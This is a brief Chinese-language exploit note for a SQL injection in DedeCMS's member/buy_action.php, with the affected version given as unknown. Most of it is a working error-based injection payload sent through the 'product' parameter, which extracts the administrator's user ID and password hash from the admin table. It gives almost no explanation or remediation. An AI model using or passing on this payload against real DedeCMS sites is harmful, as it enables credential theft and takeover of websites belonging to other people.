dedecms会员中心buy_action注入漏洞

影响版本

未知

利用方法

在member\buy_action.php中存在注入

报错注入exp

http://127.0.0.1/dede/member/buy_action.php

product=1141056911′ and char(@`’`) and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(0xC3DCC2EB,userid,0x3a,pwd)) from `#@__admin` limit 0,1),1,62)))a from information_schema.tables group by a)b))#